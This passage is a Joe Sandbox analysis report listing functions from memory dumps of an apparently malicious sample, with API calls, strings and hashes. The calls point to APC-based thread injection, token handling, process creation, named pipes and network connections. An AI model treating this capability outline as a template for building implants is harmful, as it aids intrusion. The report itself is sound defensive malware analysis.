API ID: __snprintfhtonl$AllocateHeap_malloc_memset
String ID: zyxwvutsrqponmlk
API String ID: 1734027086-3884694604
Opcode ID: 6ebeb1ce73bbebc8b54d1b6e82a4fa142275a7b8c2bceefc5245aa41185a0770
Instruction ID: e72375e13c64eaa071badf40ef147543fddb3b102dd4627a6271e046a8580538
Opcode Fuzzy Hash: 6ebeb1ce73bbebc8b54d1b6e82a4fa142275a7b8c2bceefc5245aa41185a0770
Instruction Fuzzy Hash: 0D216D62E003057BEBD07BB69C49A6F7B98DF45221F140579FF29B7282F5348D01C5A0

Uniqueness

Uniqueness Score: -1.00%

Function 0676847E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 06768486
__snprintf.LIBCMT ref: 067684B9
__snprintf.LIBCMT ref: 067684D2

Strings

%s&%s=%s, xrefs: 067684C9
?%s=%s, xrefs: 067684B0

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID: %s&%s=%s$?%s=%s
API String ID: 444161222-3403399194
Opcode ID: bc6d150bb3cf5450f33839f8820c0a3ca20f8618a6cc7b29a86be387b25c18a3
Instruction ID: 908279910bc623d0f6b98d8c1f894c974de5ea0d625854cf6386539cb1ed9589
Opcode Fuzzy Hash: bc6d150bb3cf5450f33839f8820c0a3ca20f8618a6cc7b29a86be387b25c18a3
Instruction Fuzzy Hash: 88018CB2504240BFEBD5EF00CC85E5B7BA8AF85700F8580A9BE456B142E676ED10CB72

Uniqueness

Uniqueness Score: -1.00%

Function 067656D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,067652B3,00000000,067654C2,?,?,?,?,?,?,?,?,?,00000000), ref: 067656E0
GetProcAddress.KERNEL32(00000000), ref: 067656E7
ResumeThread.KERNEL32(?,?,067652B3,00000000,067654C2,?,?,?,?,?,?,?,?,?,00000000,067654C2), ref: 0676570B

Strings

NtQueueApcThread, xrefs: 067656D6
ntdll, xrefs: 067656DB

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcResumeThread
String ID: NtQueueApcThread$ntdll
API String ID: 682313787-1374908105
Opcode ID: e1d7e4a1f8be23b25b236015722edc80d7a45d99081d659e7ae44971c9280f87
Instruction ID: cbc67f7d45545a894d1f6bbc1932b86242c5facc865dc13e62a18c10afe780dd
Opcode Fuzzy Hash: e1d7e4a1f8be23b25b236015722edc80d7a45d99081d659e7ae44971c9280f87
Instruction Fuzzy Hash: 25E092717D03097FEF501AB5AC06B5A3B5AAB04A50F508128F729C4090FB61D810DA05

Uniqueness

Uniqueness Score: -1.00%

Function 06768988 Relevance: 7.9, APIs: 5, Instructions: 369threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0676B839
OpenThreadToken.ADVAPI32(00000000), ref: 0676B840
GetCurrentProcess.KERNEL32(00000008,?), ref: 0676B850
OpenProcessToken.ADVAPI32(00000000), ref: 0676B857
CloseHandle.KERNEL32(?), ref: 0676B86D

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$CloseHandle
String ID:
API String ID: 2405408533-0
Opcode ID: 4bc08c1abfe86cea274b9fd2565ffd62e00be8099b1d79aded07475b4bccc0f4
Instruction ID: e5d7d46fb164c5384c092583064d90694d541f3b88b6a05f027701720abfdbcc
Opcode Fuzzy Hash: 4bc08c1abfe86cea274b9fd2565ffd62e00be8099b1d79aded07475b4bccc0f4
Instruction Fuzzy Hash: F8811D5126A321BDF3E833775D69FAB195C9F41AADF50CA27BF26A4080C967C44089F3

Uniqueness

Uniqueness Score: -1.00%

Function 06360759 Relevance: 7.8, APIs: 5, Instructions: 280COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06366389: _malloc.LIBCMT ref: 0636638F
Part of subcall function 06366389: _malloc.LIBCMT ref: 0636639F

_malloc.LIBCMT ref: 063607E1

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_malloc.LIBCMT ref: 063608AA
__snprintf.LIBCMT ref: 06360913
__snprintf.LIBCMT ref: 06360931
__snprintf.LIBCMT ref: 0636094F

Part of subcall function 063682D9: _memset.LIBCMT ref: 06368322

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf$_memset
String ID:
API String ID: 3514394824-0
Opcode ID: f0174a944cfa8f73630f7087a6355ca267e86ee3d2504a31ef01416b9d1456d3
Instruction ID: 7b5ca21dda3917ee98f4244baa3aeafbc4eb1cdbec26369cf78b4b1cdf931831
Opcode Fuzzy Hash: f0174a944cfa8f73630f7087a6355ca267e86ee3d2504a31ef01416b9d1456d3
Instruction Fuzzy Hash: CE814771A043006EE7D1BB77CD45B2F7AE5AFC4360F00C829F5B4A61A9EB71C5158AE2

Uniqueness

Uniqueness Score: -1.00%

Function 06764021 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,00000000,06767FC2,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,06768ED8,00000011,06764119,?), ref: 06764047
GetLastError.KERNEL32(?,?,06767FC2,06768ED8,?), ref: 06764057
GetLastError.KERNEL32(?,?,06767FC2,06768ED8,?), ref: 06764071

Part of subcall function 06763E1F: _memset.LIBCMT ref: 06763E4D
Part of subcall function 06763E1F: _memset.LIBCMT ref: 06763E69

CreateProcessA.KERNEL32(00000000,06767FC2,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,06768ED8,00000011,06764119,?,006A0875), ref: 06764096
GetLastError.KERNEL32(?,?,06767FC2,06768ED8,?), ref: 067640A0

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateProcess_memset$User
String ID:
API String ID: 3779600536-0
Opcode ID: dccece7501a955cb134667d6a28b925de70399fe5796430adc29d21da1800584
Instruction ID: 61592687f923dd8c091d535960a7c703f435b030dbfbebb936731dd8bd061b40
Opcode Fuzzy Hash: dccece7501a955cb134667d6a28b925de70399fe5796430adc29d21da1800584
Instruction Fuzzy Hash: 2D115E32561650BEDBB21AA29C48E377BFEFFC5B14B24885DFA92C0454D6228490DB32

Uniqueness

Uniqueness Score: -1.00%

Function 06767A57 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 06767A7C
GetTickCount.KERNEL32 ref: 06767A94
shutdown.WS2_32(00000000,00000002), ref: 06767AAF
shutdown.WS2_32(00000000,00000002), ref: 06767ABC
closesocket.WS2_32(00000000), ref: 06767AC1

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTickshutdown$closesocket
String ID:
API String ID: 3414035747-0
Opcode ID: 11591d10ca411780763f260f23b1a71fb8ee5ab0a8387a9bbec5348d73d6deea
Instruction ID: 74cc7d58a082305738c932ed74b2ac9dd30cd3fac90d47895deaf4e2145dbf48
Opcode Fuzzy Hash: 11591d10ca411780763f260f23b1a71fb8ee5ab0a8387a9bbec5348d73d6deea
Instruction Fuzzy Hash: 20114F31D117118FDBB49F3ED848A27B3E5BB04798B148A1EED66D3640EB30E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06765E61 Relevance: 7.6, APIs: 5, Instructions: 57pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,0676636E,?,?,?,?,?,06768AF2), ref: 06765E86
CloseHandle.KERNEL32(?,?,00000000,0676636E,?,?,?,?,?,06768AF2), ref: 06765E8B
CloseHandle.KERNEL32(?,?,00000000,0676636E,?,?,?,?,?,06768AF2), ref: 06765E90
DisconnectNamedPipe.KERNEL32(?,?,00000000,0676636E,?,?,?,?,?,06768AF2), ref: 06765EA0
CloseHandle.KERNEL32(?,?,00000000,0676636E,?,?,?,?,?,06768AF2), ref: 06765EA9

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CloseHandle$DisconnectNamedPipe
String ID:
API String ID: 2155524452-0
Opcode ID: 9bc980f72b427c3ead7489c514f6cb33d86c5d7f61b0f1f575c8795d7257c4d3
Instruction ID: 6c11d8100cc48db206cb0b8cb6dddf7f87d1ecabaed6c41864f696da41167847
Opcode Fuzzy Hash: 9bc980f72b427c3ead7489c514f6cb33d86c5d7f61b0f1f575c8795d7257c4d3
Instruction Fuzzy Hash: 70115131D116218FDFB1AF1AD800966B7B6AF44B203468519FC419B660DF71EC82DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0677E8E1 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0677E8ED

Part of subcall function 0677A735: __getptd_noexit.LIBCMT ref: 0677A738
Part of subcall function 0677A735: __amsg_exit.LIBCMT ref: 0677A745

__amsg_exit.LIBCMT ref: 0677E90D
__lock.LIBCMT ref: 0677E91D
InterlockedDecrement.KERNEL32(?), ref: 0677E93A
InterlockedIncrement.KERNEL32(067B1658), ref: 0677E965

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 66b76a6e3d245fbbbc38c8eeb659e42bc6eda80e5651a4b807b1d98579e4791f
Instruction ID: 656bb7fb7919223dad262eb050569c84d11d96ebdf7e396f83ebfc6ebb9a9184
Opcode Fuzzy Hash: 66b76a6e3d245fbbbc38c8eeb659e42bc6eda80e5651a4b807b1d98579e4791f
Instruction Fuzzy Hash: 34016136E01A11EFDFE1FB65D80876D77A1AB04724F118155DA24A7280DB349A42CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 06763293 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 067632A0
gethostbyname.WS2_32(?), ref: 067632B4
htons.WS2_32(06763377), ref: 067632DD
connect.WS2_32(00000000,?,00000010), ref: 067632ED
closesocket.WS2_32(00000000), ref: 067632F7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 530611402-0
Opcode ID: 6b5459dddbb5eaa8eaf2d61643f573dd3c21ea2df64de0b006c80e65a13eed77
Instruction ID: 863678bde81a88c20b6eb9c38648dfbf230eab538066ce10064f39b9c55677b1
Opcode Fuzzy Hash: 6b5459dddbb5eaa8eaf2d61643f573dd3c21ea2df64de0b006c80e65a13eed77
Instruction Fuzzy Hash: E2F081319902267EDB90BBB58C09FBE77A89F05630F045211FE30AA5E5E7B0DD00C395

Uniqueness

Uniqueness Score: -1.00%

Function 0636B2B0 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0636B2B7

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_malloc.LIBCMT ref: 0636B2C4
_malloc.LIBCMT ref: 0636B2DF
__snprintf.LIBCMT ref: 0636B2F2
_malloc.LIBCMT ref: 0636B311

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf
String ID:
API String ID: 1839626857-0
Opcode ID: e649b3e7cbf663415a55fa81f3617608902048137d732bf6880235c26b68b3c0
Instruction ID: 69acf760d6d89270797c14e86dddb5b9eb2268260947f633f2894e261502ab59
Opcode Fuzzy Hash: e649b3e7cbf663415a55fa81f3617608902048137d732bf6880235c26b68b3c0
Instruction Fuzzy Hash: 2A0162709003086FD7A0AF79DC84956BBE8EF55650B00C429F599C7212D678E5448BE4

Uniqueness

Uniqueness Score: -1.00%

Function 067757F0 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0677580E

Part of subcall function 067776E3: __mtinitlocknum.LIBCMT ref: 067776F9
Part of subcall function 067776E3: __amsg_exit.LIBCMT ref: 06777705
Part of subcall function 067776E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0677A7E0,0000000D,06790790,00000008,0677A8D7,00000000,?,06777315,00000000,?,?,?,06777378), ref: 0677770D

___sbh_find_block.LIBCMT ref: 06775819
___sbh_free_block.LIBCMT ref: 06775828
HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 43c397dc7f1a28eb229541a16424a302039ca44cac4c05b7eafc73c87ab8868b
Instruction ID: 07e4271620947b986c801db60e3b86f1511b860faf8a1fd4dd216070a3fb6329
Opcode Fuzzy Hash: 43c397dc7f1a28eb229541a16424a302039ca44cac4c05b7eafc73c87ab8868b
Instruction Fuzzy Hash: 41016D71D51205AFFFE46BB1AC0DB6E7BA5EF00760F60852CE624AA180DF349581CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0676B5FE Relevance: 7.5, APIs: 5, Instructions: 43threadsleepsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06761A64: VirtualProtect.KERNEL32(?,?,0676167C,00000000,00000000,00000080,?,?,0676B61F,00000000,00000001,00000000,00000000,0676167C), ref: 06761ADC

Sleep.KERNEL32(000003E8,00000000,00000000,0676167C), ref: 0676B634
ExitThread.KERNEL32 ref: 0676B63E
CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF), ref: 0676B658
WaitForSingleObject.KERNEL32(00000000), ref: 0676B65F
ExitProcess.KERNEL32 ref: 0676B66A

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ExitThread$CreateObjectProcessProtectSingleSleepVirtualWait
String ID:
API String ID: 3896636542-0
Opcode ID: b53ac575f19cb18ba6183f20492ea2f2e7a7bcb0784df80a67d011036bfbff5a
Instruction ID: c41e37a41519afb9bea99d3ad8628f358de092a366e1dac3b8aedc585fe6b232
Opcode Fuzzy Hash: b53ac575f19cb18ba6183f20492ea2f2e7a7bcb0784df80a67d011036bfbff5a
Instruction Fuzzy Hash: 04F06D72E84224AEE9E02A6AAC0DF7E2A1AD742B62F608006FF25E90C0DE704C404166

Uniqueness

Uniqueness Score: -1.00%

Function 067666EA Relevance: 7.5, APIs: 5, Instructions: 40sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 067666F7
GetTickCount.KERNEL32 ref: 067666FE
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 06766711
Sleep.KERNEL32(0000000A), ref: 06766722
GetTickCount.KERNEL32 ref: 06766728

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 28fe9209591d2f1d46661e973f21b14570790b445afc9d23b1a7cdd0118d1308
Instruction ID: a7949e58e155adb5227c5d690e5cc7a765fb4c21bc418725dd497035bc79ed49
Opcode Fuzzy Hash: 28fe9209591d2f1d46661e973f21b14570790b445afc9d23b1a7cdd0118d1308
Instruction Fuzzy Hash: A6F08272A5011CBFE7415BA5ECC48BF779EDB447D4B644436FA01D2000EA709D4197A6

Uniqueness

Uniqueness Score: -1.00%

Function 0676ABCE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 0676AC0D
__snprintf.LIBCMT ref: 0676AC1F
_strncmp.LIBCMT ref: 0676ACF5

Strings

abcdefghijklmnop, xrefs: 0676ACA7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$_strncmp
String ID: abcdefghijklmnop
API String ID: 3493850238-2486878355
Opcode ID: 2f5357abba16c522e2594caf52fa809aaec7d0cdba68235ae5dd759d5f2a5431
Instruction ID: c3bc9c261d42881c104d621104c8ccc8733d6ae55713288c6436c0e70aa5bc74
Opcode Fuzzy Hash: 2f5357abba16c522e2594caf52fa809aaec7d0cdba68235ae5dd759d5f2a5431
Instruction Fuzzy Hash: B54164B29105097FEF82DBB9DD449EF77B99B48344B204621EA01F7150FA71EE0986A1

Uniqueness

Uniqueness Score: -1.00%

Function 06378D46 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

, xrefs: 06378D94
2, xrefs: 06378DC7
l, xrefs: 06378D6D

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 235de7ee64cc3afe11349d5e718bf4f5f5b5fdc94c69d23203b1804ae805e9ce
Instruction ID: 7d7a5a2fc54dda178b97977209ca022fcdcf6189a44c92c238d287b544003c9f
Opcode Fuzzy Hash: 235de7ee64cc3afe11349d5e718bf4f5f5b5fdc94c69d23203b1804ae805e9ce
Instruction Fuzzy Hash: 22415F70C042698EDFF49A34988D3E97BF5AB12326F1406E6C1556A1D1D77C4ACACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 06377FE2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

, xrefs: 06378030
l, xrefs: 06378009
2, xrefs: 06378063

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 752d0f1a8b36f8092a05fbacc9ca9b456277ca2e10b71c12eea6a6c1fc46a698
Instruction ID: 1f4cf7878b8bd710f1c9e8b2e98c7aee3a48b62d78223a92e65c24095c908718
Opcode Fuzzy Hash: 752d0f1a8b36f8092a05fbacc9ca9b456277ca2e10b71c12eea6a6c1fc46a698
Instruction Fuzzy Hash: F1418174C06268AEDFF48B148C9C3E87BB5AB06215F1409FAC4A966591C77D4ACACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 0676862F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 06768637
__snprintf.LIBCMT ref: 06768679
__snprintf.LIBCMT ref: 0676869B

Strings

%s%s, xrefs: 06768670, 06768692

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID: %s%s
API String ID: 444161222-3438391663
Opcode ID: ec68a8f1ac0fd5da6bb509e749e2d43c78d9fc6bda75d87508436d4012e48136
Instruction ID: 3d2bd8c63dd46889d71d8e846298731eebfe69380b7af39291c136b4836fa7ee
Opcode Fuzzy Hash: ec68a8f1ac0fd5da6bb509e749e2d43c78d9fc6bda75d87508436d4012e48136
Instruction Fuzzy Hash: 0E01CCB1514204EFCB81DF00CC88E9B3BA5BF89310F058068FE445B222E731D905CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0676AFDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0676AFE6
GetCurrentProcess.KERNEL32(0676B056), ref: 0676B000

Part of subcall function 0676AF43: _memset.LIBCMT ref: 0676AF5D
Part of subcall function 0676AF43: __snprintf.LIBCMT ref: 0676AFBC

Strings

system32, xrefs: 0676B02B
syswow64, xrefs: 0676B019

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$CurrentProcess__snprintf
String ID: system32$syswow64
API String ID: 3270679572-3098820961
Opcode ID: 1430cf5b4e43d60d07610a130b54e92183bc3d7953f9838b5dd9f578898bb424
Instruction ID: 944c82119d873c972007aa346d04a574bc7a5eec160c65ae749ed9aa13933364
Opcode Fuzzy Hash: 1430cf5b4e43d60d07610a130b54e92183bc3d7953f9838b5dd9f578898bb424
Instruction Fuzzy Hash: 28F089719893056EFAD56B22FD0AF653748DF01714F104059FF18AA281FF65A6408A5A

Uniqueness

Uniqueness Score: -1.00%

Function 06765AE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

